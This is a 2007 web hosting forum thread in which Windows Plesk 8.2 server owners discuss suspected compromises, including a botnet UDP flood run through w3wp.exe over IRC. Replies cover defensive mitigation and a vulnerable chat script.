Results 1 to 18 of 18
Thread: Plesk 8.2 appears vulnerable
-
12-22-2007, 12:01 PM #1WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Plesk 8.2 appears vulnerable
This is a post in SWSoft forum http://forum.swsoft.com/showthread.p...766#post194766 )
I have experenced same problem, my problem begins 40 days ago,
I restarted server it didnt come back, so OS Reload, restoring plesk backups, one week later i Restarted Server and then server didnt come back again, so OS Reload,
Again and again, I bought Firewall for server(cisco checkpoint X16) this time F-Secure unistalled every day, the planet installed it and it unistall, after all problems they said 3 days ago that there is a problem with plesk and i should wait for Solution From SWSoft,
I mention that i had F-Secure from time i got server and i had no problem for 4 monthes,
I also ask anyone who experenced something like these to tell us,
-
12-22-2007, 09:42 PM #2Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
I beleive you must send a direct mail to swsoft support. They would be more than willing to help you as its a company who is proud of their product .
Dont forget to post your findings here
-
12-23-2007, 12:22 AM #3WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
i have asked theplanet
Hi,
I have asked theplanet and they said this is a vulnerable in plesk and swsoft is working on it, if you check there is a post in swsoft forum but no one answered.
MY Question is now is this theplanet problem or SWSOFT? i want to know any one exprienced it?
another is i checked server last night it seems that some one was on Remote desktop i checked cureit.exe was installed on desktop, and was runnig, i asked the planet support chat and they said no one is working on my server.... but i checked cureit.exe, that is a product from DR web antivirus... does hackers check my system for viruses?
-
12-23-2007, 01:13 AM #4Newbie
- Join Date
- May 2004
- Posts
- 11
I've seen a UDP flood running from one of our Windows web servers.
It keeps triggering my pager when bandwidth peaks. It was at first consuming up to 100Mbit of bandwidth but I lowered the port to 10Mbit to mitigate damages and keep killing it when it restarts. I've now got it under wraps for this particular botnet by blocking all their IPs.
I found that using tcpview.exe to kill the w3wp.exe process that was connected to IRC servers on 6667 made it stop for a bit until they restarted it. I was able to monitor and get onto the IRC server using wireshark and find out some additional details. The botnet was run by two users who are using it to UDP flood some nameservers and had 500+ bots on the server.
I think this may be in Plesk as stated and have applied the latest Plesk 8.2.0.1 updates.
I can't find any good rootkit revealer type tools for 64-bit Windows but I'm pretty sure Win64 isn't supposed to have as much problems with rootkits becuase of driver signing and the fact most are written for 32-bit.
If it is a new Plesk issue I hope a patch is released shortly!
-
12-23-2007, 03:39 AM #5Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
-
12-23-2007, 02:47 PM #6WHT Addict
- Join Date
- Sep 2003
- Posts
- 111
Hi,
I see same problem on server which are located different datacenters. Plesk is vulnerable not The Planet.
Hackers uses your server for sharing divx videos or attacking other servers.
-
12-23-2007, 02:49 PM #7WHT Addict
- Join Date
- Sep 2003
- Posts
- 111
-
12-23-2007, 04:26 PM #8WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
are you sure
Hi,
I am still in dobt...
The user was logged in as administrator with client name VZWIN2 (user name was administrator, Clinet name is not user name , it is computer name of person who logged in)
I have sent several PM by task manager but no answer, also the planet support told when he logged in his session nothing was running and when he closed session everything that was running and i saw in task manager closed.
Now new question is client name VZWIN2 one of SWSoft support computer name?
Why he didnt answered??
or If he is hacker and have remote desktop why he didnt delete data or change it? i am really worry and becomming crazy.
Regards,
Hamed
-
12-23-2007, 08:41 PM #9Newbie
- Join Date
- May 2004
- Posts
- 11
I keep seeing outbound connections to remote servers on port 6667 from w3wp.exe. I can kill this in TCPView and it doesn't affect other services.
Anyone know a good software firewall that works on Win2003 64-bit? I need to block outgoing connections to most ports - unforuntately Plesk moved to Windows Firewall from RRAS which doesn't do this.
For now I've added bogus routes for the IPs they've connected to and this has stopped all the outbound connections for a good 24 hours.
I guess it's time to get a Juniper device going unless there's a IPCHAINS / APF equivilient for Win that's reliable?
I welcome any input on this as it's been very frustrating.
-
12-23-2007, 09:21 PM #10Disabled
- Join Date
- Apr 2005
- Location
- Cochin
- Posts
- 2,452
-
12-24-2007, 01:55 AM #11WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Let me explain my problem fully
Hi,
Let me explain my problem fully and you tell if it could be a hack,
I have had no problem till i do first OS Reload, after that server was ok for one week till the planet updated my F-Secure and after a restart Server wents down, and they said another OS Reload, again they have do an Update on MY F-Secure and and another restart nothing happend but exactly a week latter and it was second restart, server didnt respond, this time outage ticket was going so long and they bringed back my server but no RDP just installed VNC and told me use that
They told me some changes on Registry that closed RDP but i asked a security person, he told me for changes on Registry it needs someone to login with Administrator roll.... but if he login with administrator, why he closed RDP? why he didnt delete data? or changes data?
and after that i done another os reload and then ordered a cisco firewall and F-secure installed again, but some days latter i saw an email on my server... IP Allert, server was restarted i logged into server and saw...wow.... F-Secure was unistalled? i created a ticket and TP installed it again another restart server comes back, again day after that i comed back. no F-Secure but No Restart... they said this is SWSoft Problem? could it be?
Could it be hack really?
Regards,
Hamed
-
12-24-2007, 02:15 AM #12WHT Addict
- Join Date
- Sep 2007
- Location
- Planet Earth
- Posts
- 154
Hi,
Let me butt in if I may. From the conversation you seem to be having you are using a WINDOWS version of PLESK 8.2. If you read very carefully through the product manuals given out by SWSoft, they prefer LINUX as their operating system of choice because of it's stability and well, ability to resist hackers.
PLESK 8.2 on LINUX is safer than PLESK (anything) on WINDOWS2003 (32/64). I know this for a fact because I used to host WINDOWS 2003 Dual AMD 64's and had nothing but problems. I am now lucky if I get an email a month from my members because I converted to just LINUX RED HAT AS 4.6 with PLESK 8.2
If you are having problems it is more than likely because you are on a WINDOWS based system.
- 64bithostProfessional Plesk Webhosting.
No overselling.
Always available for you.
http://www.64bithost.com - 1-352-3164619
-
12-24-2007, 02:21 AM #13WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
this was not my answer
Hi,
This was not my answer... i want to know could this situation be a hack? could it be from Plesk?
IS Some one from theplanet doing that ?....
Regards,
Hamed
-
12-24-2007, 02:29 AM #14WHT Addict
- Join Date
- Sep 2007
- Location
- Planet Earth
- Posts
- 154
I cannot answer to the actual fact as if it is a "hack". To better answer you question email dennis at swsoft.com his email address is info@swsoft.com. Sometimes, swsoft will login to your windows server and put software to monitor new changes. You will see if you have 'root' access that someone has loged in to the vz and that is all I'm going to expose in a public forum about PLESK. dennis is their security officer/ main programmer and can explain it to you in confidential email.
Professional Plesk Webhosting.
No overselling.
Always available for you.
http://www.64bithost.com - 1-352-3164619
-
12-24-2007, 04:06 AM #15WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
Please help me
i have sent mail, but regarding to my last emails i know they wont answer,
I hope i can get answer from specialists and server owners who are in this forum,
Please give me they way to make sure if it is a hack or from swsoft
Regards
-
12-25-2007, 02:08 AM #16WHT Addict
- Join Date
- Jan 2007
- Posts
- 124
they dont answer, they asked money
Hi,
I got email from them and they said creat ticket and pay money to geting answer.
It seems nobody ready to say if this problem is from plesk or...?
Any opinion?
Regards,
Hamed
-
12-25-2007, 12:56 PM #17Junior Guru Wannabe
- Join Date
- Aug 2007
- Posts
- 60
It's not that they are being lazy, or trying to say it is not their problem. You are looking for an answer that no one has yet. If SWSoft, The Planet, ANYONE... had the answer, a patch would be released(official or not).
Do some recon, setup a honey pot, block some ips, see what you can find yourself, it will only help bring everyone closer to a solution.
The Planet uses linux workstations. I'm not sure what rdesktop identifies as(maybe VZWIN2). It is also very possible it is SWSoft as VZ is something they use a lot(VZMC, Virtuozzo, VZPP, VZCP, vzctl, etc...).
While it is not very nice that they did not respond to you, this does not mean it was not a tech. When you are trying to do your job, and investigate something, and a customer wants to chat with you about the problem... It can be quite distracting, so messages like those are often ignored.
-
01-08-2008, 11:24 PM #18New Member
- Join Date
- Jan 2008
- Posts
- 1
w3wp UDP Flood
I have had one of our Windows Server 2003 systems spiking our bandwidth at near 100% the past few weeks. I have had to manually kill the w3wp processes running on UDP (using tcpview).
I host many websites on this system. We separated them all into individual application pools, and we narrowed it down to one website. Looking through the logs reavealed an exploit in a flash chat script were using. We renamed the chat folder to something not linked or guessable and it went away.
You will not find an infected file on your system. The attack is including a remote file via http that opens up an IRC channel on port 6667 then listens for commands to start a ddos attack with UDP packets, etc.
Google aedating4CMS and you will find out much about the hack.
Hope this helps anyone. I spent much time tracking this down and wanted to share to help!